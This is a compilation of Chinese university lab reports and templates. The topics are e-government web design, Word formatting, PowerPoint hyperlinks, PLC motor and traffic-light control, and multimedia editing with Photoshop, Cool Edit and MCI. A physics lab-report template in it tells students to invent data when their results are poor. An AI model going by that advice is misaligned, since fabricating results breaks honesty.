通过学习网络基本配置方法、图片处理软件Fireworks、Photoshop、动画制作软件Flash、网页制作软件Dreamweaver等的使用,并掌握动态网页Asp技术,在将来的学习,工作中能够应用这些知识为自己增分,并能够让学生形成一种意识,那就是在信息时代的今天,每个专业特别是我们行政管理专业的学生,掌握相关办公软件的使用对于将来的工作是重要而且是必要的,不仅如此,在网站制作的过程当中,也要求我们发挥聪明才智,利用自己的知识,见解制作与众不同的网站,并在其中得以开阔自己的视野。

二、实习时间(从实习动员开始到实习总结)、地点:

2009年6月15—7月3日即2008-2009学年第2学期第十八周至第二十周(共三周)周一至周五每天8:20—11:30在**学院电子政务实验室开始本次的电子政务实习。其中由**老师做的实习动员在管理学课下进行,最后一段时间由于我们要进行期末考试,所以实习总结留待每个学生回家完成,在下个学期开学上交给老师。

三、实习内容:

1、掌握局域网、办公网络的基本配置方法,掌握常见上网的配置方法,理解ip地址的分类,并掌握在ip地址和域名等在实际中的应用方法。(第十八周周一8:20--周一11:30)

2、掌握常用图片文件格式,学会Fireworks

8、Photoshop图片处理软件的使用,能按照自己的需要处理一般的图片文件;(第十八周周二8:20--周三11:30)

3、掌握动画制作基本概念,学会Flash 8动画制作软件的使用,能制作一般的动画,并学会从网上获取制作动画的资源,为后面综合网站制作打下基础;(第十八周周四8:20—第十九周周一11:30)

4、学习html的基本知识,并掌握Dreamweaver 8软件的基本操作,学会网页设计的基本方法,为后面综合实习打下基础;(第十九周周二8:20--第十九周周四11:30)

5、掌握动态asp网页制作的基本知识,学会利用asp建立动态网页的基本方法,掌握网站发布的方法;(第十九周周五8:20—二十周周一11:30)

6、制作一个**大学XXXX班的班级网站(或个人网站等),要求综合利用前面学习的图片处理Fireworks、动画制作Flash、网页设计软件Dreamweaver、html和asp技术,网站要有后台管理界面,能动态添加新闻,网站规划设计合理、美观。(第二十周周二8:20--周五11:30 )

四、实习总结和心得:

本次电子政务实习,虽然只有短短的三周时间,但是却很充实,学到的东西也很实用,真是获益良多。

首先,让我感受很深的是老师勤勤恳恳认认真真的教学态度,我们是两个班级一起上课,每一节课老师都做了充分的准备,包括网上寻找的案例,讲座,视频,word文档等等都准备得很到位,课上讲解很仔细,解答也很耐心,会给我们一遍一遍的演示操作,当我们很多人不理解的时候,又会毫不耐烦的又重新讲课。最后做网站的时候,由于是初次接触,出现了很多各种各样的问题,老师也会给我们找出错误的原因,帮助我们改正,使我们的网站更具美观特色。很庆幸有这样以为好老师来给我们讲课,他的教学态度也让我受益匪浅。

其次,是实习的内容让我很感兴趣,图片处理软件Photoshop、动画制作软件Flash是以前就听说过的,一直想学习这些软件的操作,因为我觉得这些软件很有用,平时需要处理图片的时候就很深刻的感受到使用其他的软件而不是使用PS就觉得总是不那么完美,PS给我的印象也是神秘诱人。试过自己下载这个软件,但是操作起来不是得心应手,现在有了老师的指导,以前的一些不明白也变得明朗,也懂得了一些简单的操作,可以制作,合成一些秀美的图片,相信会在不久的将来得到很好的应用。对于Flash网上看了很多,觉得学会做Flash很了不起,特别是当一个人可以把他内心构想的一个故事,一个情节,或者就是一首歌,用flash的形式展现出来,让我们看到活灵活现的人,或者生动的画面,让我们欣赏的不仅是艺术的美,更是人创造的美。在学习flash软件的使用的那几天我特别用心,上课认真的听讲,下课请教学会的同学,跟着老师的步骤踏踏实实的学好基本功,从最基础的动画制作开始。现在,我已经学会的基本的操作,但是我知道,要能够制作一个完整的美观的动人的flash动画还有很长的路要走,还要花很多的功夫,所谓“师傅领进门,修行在个人”, 我会继续努力,不会白学的。我梦想着有一天自己可以做出一个声色俱全的flash动画,把内心的想法变成一幅幅动人的画面。

再次,我想说下实习期间我的感受。学习期间,总觉得有点困难,一些东西总是接受不了,总是老师讲课的时候是听懂了,也会做了,觉得就是挺简单的,但是当自己动手做的时候,往往忘记了其中的一些步骤,那些认为简单的也变得很难以克服。从中我也明白了,老师讲的时候我应该要做下笔记,正因为我没有做笔记,才把其中的一些步骤漏掉。人有时不能太自信于自己的记忆,必须依靠辅助的工具。人有些记忆不可能一直保存,但是笔记却可以,所以,笔记很重要。特别是当我们对于一些不是很经常使用到的软件的用法时,一些简单步骤的方法用笔记下来,有助于以后的使用。

我感受最深的是自己制作完成一个网站,这让我认识到:无论什么事情都应该是这样的,只有你去尝试过了,为之努力过了,才会明白其中的艰辛,那样子你的收获才是最多的,认识才是最深刻的。当老师说我们要以小组的形式合作建立一个网站的时候,我觉得自己根本还是能力不够,我问自己:就学了这么点知识,足够建立一个网站了吗?而且,对于老师所教的东西,自己并没有全部把握。但是,我还是决定尝试,因为不仅有我,还是我们整个小组一起努力。首先我们确定网页的主题是班级的网站,因为我们以前曾做过很多班上的视频,还有挺多班上的照片,只要把其中需要的部分选出来,素材就算准备好了。确定主题之后,我们先做了一个主页的模版,然后开始构思应该要加哪些东西在主页,网页分为几个部分,每个部分又包括什么内容,分工如何,就这些我们就讨论了好久,最后决定从实际出发,考虑我们要表达的主要内容,符合班级网站的主题,把网页分为主页,班级管理,班级简介,班级相册,小组成员这几个部分。其中

主页显示的是“成长纪念册——我们的空间”,可以连接到每个同学的qq空间;还有我们政治学与行政学专业的简介和班级的视频。班级管理放了班级的规章制度;班级简介则包括my love ,my song, my cla;班级相册里包括我们班许多活动的照片,还有几个视频;小组成员则是我们小组几个人的一个简单视频相册。

班级简介这一部分主要是由我来完成的。我想了好久应该加什么东西在班级简介上才能体现我们的特色!在征求大家的建议和意见之后,决定班级简介分为my love ,my song, my cla三个部分,其中my love和my cla两部分的文字都是由我自己亲手写的,还花了许多的心思上网找寻了符合风格的图片,制作了漂亮的文字动画;my song即为我们的班歌。班级简介这一部分不仅用到了ps的知识,还用了一个新的软件“美图秀秀”以增加图片的动画效果。当把链接做好,一按连接就可以出现一幅幅动人的图画时,我的心里真是感到安慰,那个时候我觉得自己好有成就感!其他的几部分就按照分工有其他成员完成。

最后,我还参与了制作主页。一般人都是先制作好主页再开始其他网页的制作,我们则是相反的。主页部分我主要是负责添加“成长纪念册——我们的空间”这一部分。当最后把全部的连接做好,重新打开我们的网站,我看到的是一个声色俱全,图情并茂,充满诗情画意,又不失活泼亮丽的网站,第一个感觉是,这是我做出来的网站吗?第二个感觉是,这真的是我做出来的网站!虽然花了很多的心思,但是总算是有了收获,也让自己充实,满足,那时心里别提多高兴了!

把班级网站交给老师,我们的实习也到了尾声。可能对于不同的人来说会有不同的收获,也许有的人会一无所获,但是对于我来说,我有收获,不仅是知识的充实,也是人生的充实,更是心灵的充实。我努力过,并体验到了努力之中辛苦与快乐,努力之后的满足和笑容,这是大学生活学习中一篇优美的乐章,是我以后工作学习的一个知识经验加油站,我会好好珍藏!

推荐第6篇:大学计算机实验报告一

大学计算机实验报告一

长文档的组织、编辑与排版

名: 学

号: 专

业: 年

级: 指导教师:

日1 实验目的

学会长文档的组织、编辑、排版,能够解决实际生活、工作和学习中的问题,具有实际意义。

2 实验内容

完成一篇论文的组织、编辑与排版。

3 实验总体要求

内容自选,忽略其主题和学术性。组织长文档的方式和途径、编辑和排版的相关格式参见所给格式。

4 实验包含的知识点

(1)文档的创建、保存、关闭及文本的输入 (2)查找和替换 (3)文本格式的设置

(4)文本与段落边框底纹的设置 (5)页面设置

(6)项目符号和编号的使用 (7)分栏

(8)图片、文本框和艺术字的插入与编辑 (9)绘制图形

(10)公式的编辑与修改

(11)建立表格并对表格进行编辑和格式化设置 (12)插入分隔符和页码 (13)创建和编辑页眉和页脚 (14)样式的使用

1 (15)标注参考文献 (16)生成目录

5实验总结

这里介绍一下自己做这个实验的心得体会。

6附你已制作好的长文档(电子版) 7得分

推荐第7篇:大学一年级 MicrosoftPowerPoint 实验报告

天津理工大学信息工程系信管专业计算机实践论文

天津理工大学

课程设计报告

课程设计题目:

学生学号:07322100

学生姓名:某某某

业:信息管理与信息系统 指导教师:

2008年6 月26 日

天津理工大学信息工程系信管专业计算机实践论文

概 述

PowerPoint(PPT)是当今流行的电子文稿演示和制作软件,具有制作速度块,兼容性好等优点,PowerPoint(PPT)已作为了当今学校,科研场所,公司团体必备和必须掌握的软件之一。作为大学生的我们,PowerPoint(PPT)不仅是我们将来就业需求需要掌握的软件,也是全国计算机等级考试中的考试内容之一。在本次实验中,我选择了PowerPoint(PPT)中第二个作为论文课题。

天津理工大学信息工程系信管专业计算机实践论文

一、实验目的—————————————————————4

二、上机操作步骤———————————————————4

三、上机实验结果截图—————————————————5

四、经验总结—————————————————————7 天津理工大学信息工程系信管专业计算机实践论文

一、实验目的

通过本次上机操作实验,力求掌握PPT中自定义动画的使用,链接的使用,对PPT中层的理解,图片的融合等内容,力求做出精美的幻灯片取悦受众。

二、上机操作步骤

1.启动 PowerPoint ,打开演示文稿5-1;

2.将演示文稿5-2添加至演示文稿 5-1 中,并置于 5-1 的幻灯片之后; 3.在第一张幻灯片中删除主标题栏,另复制一份副标题栏,并在第一张幻灯片中插入图片5-

3、图片5-4。在两个副标题栏中分别输入“季节”“动物”字体分均为黄色,华文行楷。

4.第二张幻灯片主标题拦住写入文字“鸟瞰”,单击主标题栏边缘点击鼠标右键,选择“自定义动画”选项,在右侧栏中单击“添加效果”按钮,添加“溶解” 效果。

5.在“冬”所在的幻灯片中插入图片5-4,在“冬”所在幻灯片中插入文本框并输入文字“返回”18 号字,加粗,淡蓝色,华文行楷;在“冬”所在幻灯片中插入文本框并输入文字 \" 返回 \" , 18 号字,加粗,淡蓝色,华文行楷; 6.分别将幻灯片一中的“季节”“动物”分别拖到图片5-

3、图片5-4中央,分别按住Shift键选择图片5-

3、“季节”,单击鼠标右键选择“组合”选项。图片5-

4、“动物”类似处理。

7.在第一张幻灯片中选择“季节”按钮,单击右键选择“超链接”,链接到幻灯片三;在第一张图片中选择“动物”按钮,单击右键选择“超链接”,链接到幻灯片七。在第六张幻灯片中选择返回“按钮”单击鼠标右键选择“超链接”,链接到幻灯片一。

8.将“冬”所在幻灯片中的按钮及文本框复制到最后一张幻灯片;9.播放幻灯片,并单击幻灯片中的各链接按钮,观察播放效果。

天津理工大学信息工程系信管专业计算机实践论文

三、上机实验结果截图

幻灯片一

幻灯片六

天津理工大学信息工程系信管专业计算机实践论文

幻灯片九

天津理工大学信息工程系信管专业计算机实践论文

四、经验总结

充分利用超链接功能可以快速进行不同幻灯片之间的转换;利用图层对象组合功能可以制作具有文字的立体质感强烈的按钮,增加PPT美观性。这次PowerPoint(PPT)上机实验让我们不仅锻炼了实际操作能力,也让我们懂得软件和文件制作中也要充分考虑美观性,以及做系统性的文件需要有事先准备好的逻辑构思。感谢老师

在这次上机实验中给与我们的亲切关怀和指导。

推荐第8篇:大学计算机基础实验报告

《大学计算机基础》实验报告

学号:姓名:班级:

任课教师:

一、实验内容:

二、实验要求:

三、实验过程(说明详细步骤,可以截图说明):

四、问题与总结:(总结实验进行情况,并列出实验时遇到的问题,供任课教师参考。

推荐第9篇:大学普通物理实验报告

大学普通物理实验报告模板

该有试验报告纸和试验预习报告纸。有的话照着填。没有的话这样: 预习报告:

1.试验目的。(这个大学物理试验书上抄,哪个试验就抄哪个)。

2。实验仪器。照着书上抄。

3.重要物理量和公式:把书上的公式抄了:一般情况下是抄结论性的公式。再对这个公式上的物理量进行分析,说明这些物理量都是什么东东。这是没有充分预习的做法,如果你充分地看懂了要做的试验,你就把整个试验里涉及的物理量写上,再分析。

4.试验内容和步骤。抄书上。差不多抄半面多就可以了。

5.试验数据。做完试验后的记录。这些数据最好用三线图画。注意标上表号和表名。EG:表1.紫铜环内外径和高的试验数据。

6.试验现象.随便写点。

试验报告:

1.试验目的。方法同上。

2.试验原理。把书上的归纳一下,抄!差不多半面纸。在原理的后面把试验仪器写上。

3。试验数据及其处理。书上有模板。照着做。一般情况是求平均值,标准偏差那些。书上有。注意:小数点的位数一定要正确。

4.试验结果:把上面处理好的数据处理的结果写出来。

5.讨论。如果那个试验的后面有思考题就把思考提回答了。如果没有就自己想,写点总结性的话。或者书上抄一两句比较具有代表性的句子。

实验报告大部分是抄的。建议你找你们学长学姐借他们当年的实验报告。还有,如果试验数据不好,就自己捏造。尤其是看到坏值,什么都别想,直接当没有那个数据过,仿着其他的数据写一个。

不知道。建议还是借学长学姐的比较好,网络上的不一定可以得高分。每个老师对报告的要求不一样,要照老师的习惯写报告。我现在还记得我第一次做迈克尔逊干涉仪实验时我虽然用心听讲,但是再我做时候却极为不顺利,因为我调节仪器时怎么也调不出干涉条纹,转动微调手轮也不怎么会用,最后调出干涉条纹了却掌握不了干涉条纹“涌出”或“陷入个数、速度与调节微调手轮的关系。测量钠光双线波长差时也出现了类似的问题,实验仪器用的非常不熟悉,这一切都给我做实验带来了极大的不方便,当我回去做实验报告的时候又发现实验的误差偏大,可庆幸的是计算还顺利。总而言之,第一个实验我做的是不成功,但是我从中总结了实验的不足之处,吸取了很大的教训。因此我从做第二个实验起,就在实验前做了大量的实验准备,比如说,上网做提前预习、认真写好预习报告弄懂实验原理等。因此我从做第二个实验起就在各个方面有了很大的进步,实验仪器的使用也熟悉多了,实验仪器的读数也更加精确了,仪器的调节也更加的符合实验的要求。就拿夫-赫实验/双光栅微振实验来说,我能够熟练调节ZKY-FH-2智能夫兰克—赫兹实验仪达到实验的目的和测得所需的实验数据,并且在实验后顺利地处理了数据和精确地画出了实验所要求的实验曲线。在实验后也做了很好的总结和个人体会,与此同时我也学会了列表法、图解法、函数表示法等实验数据处理方法,大大提高了我的实验能力和独立设计实验以及创造性地改进实验的能力等等。

下面我就谈一下我在做实验时的一些技巧与方法。首先,做实验要用科学认

真的态度去对待实验,认真提前预习,做好实验预习报告;第二,上课时认真听老师做预习指导和讲解,把老师特别提醒会出错的地方写下来,做实验时切勿出错;第三,做实验时按步骤进行,切不可一步到位,太心急。并且一些小节之处要特别小心,若不会,可以跟其他同学一起探讨一下,把问题解决。第四,实验后数据处理一定要独立完成,莫抄其他同学的,否则,做实验就没有什么意义了,也就不会有什么收获。

总而言之,大学物理实验具有非常重要的意义。首先,物理概念的建立、物理规律的发现依赖于物理实验,是以实验为基础的,物理学作为一门科学的地位是由物理实验予以确立的;其次,已有的物理定律、物理假说、物理理论必须接受实验的检验,如果正确就予以确定,如果不正确就予以否定,如果不完全正确就予以修正。例如,爱因斯坦通过分析光电效应现象提出了光量子;伽利略用新发明的望远镜观察到木星有四个卫星后,否定了地心说;杨氏双缝干涉实验证实了光的波动假说的正确性。可以说,物理学的每一次进步都离不开实验。这对我们大学生来说也是非常重要的,尤其是对将来所从事的实际工作所需要具备的独立工作能力和创新能力等素质来讲,也是十分必要的,这是大学物理理论课不能做到,也不能取代的。

推荐第10篇:海南大学plc实验报告

电气控制及可编程序控制器技术

实验一

电机正反转控制

一、实验目的

1. 学习和掌握PLC的实际操作和使用方法 ;

2. 学习和掌握PLC控制三相异步电动机正反转的硬件电路设计方法;

3. 学习和掌握PLC控制三相异步电动机正反转的程序设计方法;

4. 学习和掌握PLC控制系统的现场接线与软硬件调试方法。

二、实验设备

主机模块,电源模板,电机正反转控制实验板,开关、按钮板,连接导线一套。

三、实验原理

三相异步电动机定子三相绕组接入三相交流电,产生旋转磁场,旋转磁场切割转子绕组产生感应电流和电磁力,在感应电流和电磁力的共同作用下,转子随着旋转磁场的旋转方向转动。因此转子的旋转方向是通过改变定子旋转磁场旋转的方向来实现的,而旋转磁场的旋转方向只需改变三相定子绕组任意两相的电源相序就可实现。

四、控制要求

1、初始状态

接触器KM

1、KM2都处于断开状态,电机M1处于停止状态。

2、启动操作 (1) 正转控制

按下电机正转按钮SB2,KM1闭合,电机M1正转;按下按钮SB1,电机停止运行。 (2) 反转控制

按下电机反转按钮SB4,KM2闭合,电机M1反转;按下按钮SB1,电机停止运行。 (3) 正反转切换控制

当电机正转时,按下按钮SB4,KM1断电,KM2闭合,电机M1反转。

当电机反转时,按下按钮SB2,KM2断电,KM1闭合,电机M1正转。

3、停止操作

按下停止按钮SB1,电机M1无论在何种状态电机都将停止运行。

4、过载保护 当电机过载时(按下按钮FR1),电机停止运行。

五、输入输出分配

1、输入

SB1——X001(停止按钮) SB2——X002(电机M1正转按钮) SB4——X004(电机M1反转按钮) FR1——X005(热继电器保护)

2、输出

KM1——Y001(电机正转接触器) KM2——Y002(电机反转接触器)

X001Y001KM1 SB1X002Y002KM2 SB2SB3X004 X005 FRCOMCOM AC

六、实验程序 1.梯形图程序

2.指令表程序

实验二

电机星形起动三角运行

(TVT90HC-1)

一、实验目的

1.学习和掌握PLC的实际操作和使用方法 ;

2.学习和掌握PLC控制三相异步电动机星形起动三角运行的硬件电路设计方法;

3.学习和掌握PLC控制三相异步电动机星形起动三角运行的程序设计方法;

4.学习和掌握PLC控制系统的现场接线与软硬件调试方法。

二、实验设备

主机模块,电源模板,电机星形起动三角运行实验板,开关、按钮板,连接导线一套。

三、实验原理

对于正常运行的定子绕组为三角形接法的鼠笼式异步电动机来说,如果在启动时将定子绕组接成星形,待起动完毕后再接成三角形,就可以降低启动电流, 减轻它对电网的冲击,这样的起动方式称为星三角减压启动,或简称为星三角启动(Y-Δ启动)。星三角起动法适用于正常运行时绕组为三角形联接的的电动机,电动机的三相绕组的六个出线端都要引出,并接到转换开关上。起动时, 将正常运行时三角形接法的定子绕组改接为星形联接,起动结束后再换为三角形连接。

四、控制要求

1、初始状态

接触器KM

3、KMY、KMΔ都处于断电状态,电机M2处于停止状态。

2、启动操作

按下启动按钮SB2,接触器KM

3、KMY闭合,电机M2接成星型连接,实现降压启动,3秒钟后KMY断开、KMΔ闭合,电机接成三角型连接,投入正常运行。

3、运行过程中发生过载(按下按钮FR2)或按下停止按钮SB1时,无论电机处于何种状态都将停止运行,其它设备恢复初始状态。

五、输入输出分配

1、输入 SB1——X001(停止按钮) SB2——X002(启动按钮) FR2——X003(热继电器保护)

2、输出

KM3——Y001 (电机星型连接接触器) KMY——Y002(电机角型连接接触器) KMΔ——Y003

SB1X001Y001KM3 SB2X002Y002KMY X003Y003KMFR COMCOM

AC

六、实验程序 1.梯形图程序

2.指令表程序

实验三

天塔之光(发射型闪烁)

(TVT90HC-2)

一、实验目的

1.用PLC构成灯光闪烁控制系统;

2.熟悉掌握日本三菱公司PLC的硬、软件功能和性能后,练习PLC的实用接线;3.学习和掌握三菱PLC控制系统的现场接线与软硬件调试方法。

二、实验设备

主机模块,电源模板,天塔之光实验板,开关、按钮板,连接导线一套。

三、实验原理

本次毕业设计是应用三菱PLC天塔之光设计的硬件电路,并利用梯形图控制程序设计。通过控制定时继电器的功能来实现各彩灯按一定的规律点亮和熄灭。接通延迟定时器SD的特点(如果RLO有正跳沿,则接通延迟定时器启动指令,以设定的时间值启动指令的定时器)。这种控制电路结构简单,可靠性高,应用性强;软件程序适应范围广,对各彩灯按一定的规律点亮和熄灭的控制,只需要改变相应的定时器的时间接通即可。

四、控制要求

1、初始状态

灯塔上的各个灯均为熄灭状态。

2、启动操作

按下启动按钮SB1,L1亮,1s后灭;接着L2,L3,L4,L5亮,1s后灭;随之L6,L7,L8,L9亮,1s后灭;如此循环。

3、停止操作

按下停止按钮SB2,灯塔上的各个灯全部熄灭。

五、输入输出分配

1、输入

启动按钮--X000 停止按钮--X001

2、输出 L1--Y001 L2--Y002 L3--Y003 L4--Y004 L5--Y005 L6--Y006 L7--Y007 L8--Y010 L9--Y011

3、灯的布局

单个小绿灯为L1;黄灯从左至右为L

2、L

3、L

4、L5;红灯从左至右为L

6、L

7、L

8、L9。

六、实验程序 1.梯形图程序

COMSB1SB2FRX001X002X003Y001Y002Y003Y004Y005Y006Y007Y010Y011COM L1L2L3L4L5L6L7L8L9 2.指令表程序

实验四

交通灯自控与手控

(TVT90HC-3)

一、实验目的

1.用PLC构成交通灯自控与手控控制系统;

2.熟悉掌握日本三菱公司PLC的硬、软件功能和性能后,练习PLC的实用接线;3.学习和掌握三菱PLC控制系统的现场接线与软硬件调试方法。

二、实验设备

主机模块,电源模板,交通灯自控与手控实验板,开关、按钮板,连接导线一套。

三、控制要求

1、初始状态

东西、南北两路交通灯及人行道交通灯都处于关闭状态,路面交通灯数码显示区显示00。

2、操作顺序

当按下“开始”按钮,交通灯开始工作。首先东西向绿灯亮4秒后闪2秒,然后东西向黄灯亮3秒,接着东西向红灯亮9秒,同时在数码显示区用倒计时方式显示东西向指示灯的剩余时间。与东西向交通灯对应的是南北向红灯亮9秒后,然后南北向绿灯亮4秒闪2秒,接着南北向黄灯亮3秒,在此过程中南北路交通灯无对应的数码显示。在此运行过程中人行道指示灯L1红灯亮表示禁止行人通过。

当按下人行道通行按钮“S1”,此时东西向、南北向交通灯均显示出红灯亮,表示十字路口的车辆都禁止通过。与此同时人行道红灯L1灭,绿灯L2亮表示行人可以通过此路口,时间为10秒钟,同时数码显示当前人行道的剩余时间,当时间为零后立即返回到原来的路口状况,交通灯接着正常运行。

3、停止操作

当按下“停止”按钮交通灯都停止运行。数码显示牌显示00。

四、输入输出分配

1、输入

启动——X000; 停止——X001; S1——X002(人行道通行钮)

2、输出

东西绿——Y010; 东西黄——Y011; 东西红——Y012; 南北绿——Y013; 南北黄——Y014; 南北红——Y015 L1——Y016(人行道红灯); L2——Y017(人行道绿灯) SEG接法

A0——Y000; B0——Y001; C0——Y002; D0——Y003; A1——Y004; B1——Y005; C1——Y006; D1——Y007 启动SB1SB2停止S1人行通道X000X001X002Y000Y001Y002Y003Y004Y005Y006Y007Y010Y011Y012Y013Y014Y015Y016Y017COMCOM A0B0C0D0A1B1C1D1东西绿东西黄东西红南北绿南北黄南北红红灯绿灯

五、实验程序 1.部分梯形图程序

第11篇:中南大学多媒体实验报告

《多媒体技术》 实验报告

学 院: 信息科学与工程学院 班 级:

学 号: 姓 名:

1 目录

实验一 图像采集与编辑实验 ..............................................3

一、

二、实验目的 ...................................................................................................................3 实验内容及成果 .......................................................................................................3

实验二 音频信号的获取与处理 ..........................................5

一、

二、

三、

四、实验目的 ...................................................................................................................5 实验设备 ...................................................................................................................5 实验内容及步骤 .......................................................................................................5 思考题 .......................................................................................................................6

实验三 波形音频播放器 ......................................................6

一、

二、

三、实验目的 ...................................................................................................................6 实验内容及要求 .......................................................................................................7 思考题 .......................................................................................................................8

实验四 数字视频播放器 ......................................................9

一、

二、实验目的 ...................................................................................................................9 实验内容及要求 .......................................................................................................9

实验五 视频编辑实验 ........................................................11

一、

二、实验目的 .................................................................................................................11 实验内容及要求 .....................................................................................................11 实验六 综合实验 ................................................................14

一、实验目的 .................................................................................................................14

二、实验内容及要求 .............................................................................................................14

2

实验一 图像采集与编辑实验

一、实验目的

1.了解数码相机基本使用。

2.熟悉PHOTOSHOP在图像处理上的用途。3.掌握PHOTOSHOP一些基本的图像操作。

二、实验内容及成果

通过学习PHOTOSHOP的基本操作,制作以下三种图像编辑效果图。 1.海市蜃楼效果

制作要求:用数码照自己的照片,采用图形合并等技术,将自己的照片移植至提供的风景图片中,制造出海市蜃楼效果。

步骤: 准备好两张图象,一张沙漠图片,一张自己照片。

在工具箱中用矩形工具选区所需的头部图象。用工具箱中的移动工具将图象移到沙漠图象中,作为一个新层Layer 1。点击菜单“Edit编辑/Free Transform自由变换”命令来缩放图象的大小,并移动到适当的位子。选择背景擦除工具

,将人物头部之外的部分擦掉。按住Ctrl键,同时用鼠标单击图层面板中的Layer 1 层,将人物头像选取。 选择羽化菜单,设置羽化半径为“10 pixels”。在图层面板中的图层1单击鼠标右键,选择“剪切得到图层”命令将羽化的图象剪切到新层2,右键单击图层1,删除图层1。适当修饰后合并图层,得到最终效果图,如下:

2.换脸技术

制作要求:选择一张明星照片,将自己用数码照的照片中的脸换明星的脸,得到你的脸和明星的身材的新明星组合体。

3 步骤:选择两张图片

首先抠图,将自己的脸轮廓选中。然后在工具箱中选择移动工具,按住选区不放,将头像移动到另外一张图象里。适当调整大小和位置。在工具箱中选择多边套选工具

选取多余的部分,并按delete键将它删除。选取底图为

,使脸部的边缘颜色和底图相近。选取工作图层,点击工具箱中的图章工具工具箱中的海绵工具最终得到成品图如下:

,涂擦图象边缘,使之模糊一点一边和底图更加融合。3.特殊字体

制作要求:将自己的名字、班级、学号等信息制作成如下字体中的任两种:发光字,火焰字,霓虹字,立体字。

选择制作发光字和火焰字。 步骤: 发光字

新建立一个RGB图像,大小为12×6厘米,背景为黑色。使用文字工具在图像中输入名字。 拖曳“”到图层面板底部的新建按钮

,复制出一个副本层。按Ctrl键单击面板中的副本层,安装文字选区。执行“选择|修改|扩展”命令,扩展量为4个像素。执行“选择|羽化”命令,羽化半径为3个像素。将前景色设置为浅黄绿色

,然后执行“编辑|填充”命令,使用前景色填充选区。拖曳副本层至“发光”层下方,然后单击“发光层”,将它设置为当前层。按Ctrl键单击“”文字层载入文字选区,执行“编辑|填充”命令,使用黑色填充文字选区。将前景色设置为更亮的黄绿色,执行“编辑|描边”命令,描边宽度为2个像素。按Ctrl+D组合键取消选区,然后合并图层,完成发光文字的制作。如下图:

火焰字

4

新建一个灰度模式的图像文件,背景填充为黑色。使用文本工具在图像中输入“电气”两字,颜色为白色。调整文字的位置,合并图层。将图像顺时针旋转90度, 执行风吹滤镜。选择对话框中的“风”项,“方向”栏中的“从右”项。然后再次使用刚使用过的风吹滤镜,加强风吹效果。将图像逆时针旋转90度执行波浪滤镜使火焰飘起来。将图像转换为Indexed Color模式。执行“颜色表”命令,打开Color Table对话框,在Table列表中选择“黑体”色表。执行RGB Color命令,将图像转换为RGB模式。完成燃烧字的制作。如下图:

实验二 音频信号的获取与处理

一、实验目的

1.熟悉多媒体素材声音的采集和制作;2.了解多媒体声音的基本构成要素;

3.练习使用多媒体声音的录制、编辑和合成软件。

二、实验设备

1.安装有Cool Edit Pro软件和windows操作系统的微机系统; 2.麦克风和耳机。

三、实验内容及步骤

通过录音机将本人声音录入,并用Cool Edit软件处理声音;去除声音文件的噪声;声音文件添加混响效果;进行淡入淡出处理;合成声音文件。

5 步骤: 1.打开录音机,通过麦克风录制一段语音信号作为自我介绍。

2.用Cool Edit软件加载录音机的声音,并且将背景音乐“背景音乐-轻柔.MP3”也加载于其中,试听两个文件共同播放的效果,并且调整二者音量大小,使共同播放时二者均能听清。 3.对他降噪,去除其中的杂音。

4.选择所给出的原始录音文件,将其与本人所录的音乐按字剪辑,组合成一个新的音频文件,并做降噪等处理,保存成一个新的文件。5.添加一些音效。

6.对背景音乐进行淡入淡出处理。7.生成的声音合成,输出一个合成文件。

四、思考题

1. 数字音频通常使用的采样率为多少?

标准采样频率为44.1KHZ,量化位数为16位,立体声;常用的有8kHz , 11.025kHz, 22.05, kHz 16kHz, 44.1kHz, 48kHz等。

2. 请举出三种多媒体音频技术中常用的存储声音信息的文件格式?

CD文件、MP3文件、WAV文件、VOC文件、MIDI文件、AIF文件、SNO文件和RMI文件等

3. 怎样使用Cool Edit进行混音处理?

选择“ 效果 ”,“ 常用效果器 ”里面的 “ 混响 ”“ 简易混响 ”“ 完美混响”等。

4.使用Cool Edit混音处理后的声音文件如果出现背景音乐过大或过小的问题,如何解决此问题?

在伴奏音轨点右键,选音轨音量适当调节。

实验三 波形音频播放器

一、实验目的

1.了解Wave文件格式,并学习Windows下用MCI函数播放Wave文件。

6 2.熟悉多媒体开发工具——Visual C++。 3.制作波形音频播放器。

二、实验内容及要求

1.用VC建立应用程序框架:

a) 菜单,点击新建 b) 编制应用程序界面

c) 点击查看建立类向导,在Meage Maps中建立相应的消息函数OnOpen(), OnPlay(), OnRecord(), OnSave(), OnStop(),点击确定。

2.建立处理波形音频的类CWaveAudio 3.加入所需的功能: a) 在CWavePlayerDlg类中加入成员变量

b) 在BOOL CWavePlayerDlg::OnInitDialog()中进行初始化

c) 在OnOpen(), OnPlay(), OnRecord(), OnSave(), OnStop() 中添加代码 4.实验注意事项:

a)调试程序时,Ctrl+F7 为Compile,Build为F7,运行时按F5。 b)注意可重用类CwaveAudio的设计。 c)熟练掌握MCI多媒体函数的应用。

d)编译时,菜单选中“项目”“设置”,要在库的链接中加入winmm.lib

实验成果如下:

7

思考题

1.什么是MCI接口?简述MCI所囊括的内容。

MCI ( Media Control Interface ) ,即媒体控制接口,向基于Windows操作系统的应用程序提供了高层次的控制媒体设备接口的能力。MCI接口包括了CDAudio(激光唱机)、Scanner(图像扫描仪)、VCR(磁带录像机)、Videodisc(激光视盘机)、DAT(数字化磁带音频播放机)、DigitalVideo(窗口中的数字视频)、Overlay(窗口中的模拟视频叠加设备)、MMMovie(多媒体影片演播器)、Sequencer(MIDI音序设备)、WaveAudio(波形音频设备)、Other(未定义的MCI设备)等多媒体的主要产品。 2.Windows下播放波形文件可采用几种方法?各有什么优缺点?

Windows下波形文件有四种播放方法。

MeageBeep播放方式,sndPlaySound播放方式,MCI播放方式,WaveOut播放方式。

波形文件的MeageBeep播放方式原理简单,操作灵活,不需声卡也能发出鸣叫声。但该方法仅适用于播放较短的波形文件,且波形文件必须要位于Windows目录下。

sndPlaySound播放方式功能很强,可以播放磁盘文件或内存中的波形数

8 据,还可以将波形文件作为资源来播放。但该方法有很大局限性,播放对象是比较小的文件(100KB)以内,其次,需要将几个波形文件连续播放时,不能体现出Windows的优越性,CPU利用率低。

MCI播放方式提供了一个标准接口,将声卡,视卡,CD激光唱片等当做一个设备去处理。但代码较长,必须用后释放句柄。

WaveOut是最低层的播放方式,能控制产生的声音(如音量,放音速度,音调)已达到音响硬件功能极限。但是代码量非常大,且需熟悉RIFF文件结构。 3.简述Windows下多媒体程序开发的特点。

Windows的API对很多多媒体内容都可以支持。此外,directShow是非常重要的多媒体开发工具。Windows Media就是基于DirectShow的。

数字视频播放器

一、实验目的

1.进一步掌握MCI函数的应用。

2.制作数字视频播放器,并具有以下功能:打开视频播放设备,播放视频文件,可静态观看每一帧视频,并且可设置播放速度,还能在全屏播放与正常播放之间转换。

二、实验内容及要求

1.如实验3建立应用程序框架 2.制作应用程序界面

a) 制作对话框

